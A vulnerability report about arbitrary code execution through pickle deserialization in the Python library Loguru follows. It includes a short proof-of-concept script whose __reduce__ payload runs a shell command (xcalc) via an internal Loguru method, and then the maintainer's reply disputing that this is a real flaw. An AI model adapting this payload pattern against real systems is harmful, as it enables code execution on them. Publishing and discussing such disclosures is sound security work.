Arbitary code execution loguru

[Anon-Artist]

Description

Loguru is a library which aims to bring enjoyable logging in Python.

• Vulnerability description
  untrusted loading of data by the pickle.load function leading to Arbitrary code execution.

Proof of Concept

Run exploit.py

import os
import pickle
#os.system('pip install loguru')
from loguru import _recattrs
#payload formation
class ArbitraryCode:
    def __reduce__(self):
        cmd = ('xcalc')
        return os.system, (cmd,)
dumps = pickle.dumps(ArbitraryCode())
_recattrs.RecordException._from_pickled_value(dumps,dumps,dumps)

• pip3 install loguru
• python3 exploit.py

[Anon-Artist]

Fixed

[Anon-Artist]

Fixed

[Delgan]

Hey @Anon-Artist, sorry to bump this ticket almost one year later. I'm the maintainer of Loguru, do you have a few minutes to clarify the issue please?

The PoC you shared demonstrates a way to execute arbitrary code using one Loguru's method. This is true, however I don't understand why this would make Loguru insecure by itself. Here are my concerns:

• The offending method is not part of the Loguru public API. It is intended for internal use only. It doesn't look different to any other library using pickle internally, for example:

import logging.handlers
logging.handlers.pickle.loads(malicious)

• There are in my opinion legitimate uses for pickle as long as the loaded data comes from a trusted source. Loguru does not try to load strings from user input or network. It's only uses pickle to serialize objects already loaded in the code (and therefore already have a harmful power if they are malicious, without Loguru being able to do anything about it).
• Conceptually, the PoC doesn't look different from simply displaying a malicious object using logger.info():

import os

class MyClass:
    def __str__(self):
        os.system("xcalc")

logger.info(MyClass())

• The way Loguru uses pickle is very similar to how built-in multiprocessing serialize objects passed to Pool or Queue, yet it's not considered as a code injection vulnerability. The user may need his trusted personal classes to be serialized.

Perhaps I am missing a key element of understanding, but I feel Loguru is unfairly flagged for using pickle. Given my explanations, is there any way to reconsider your judgment regarding Loguru's safety? Is is possible to avoid marking Loguru as non-secure without compromising its functionality?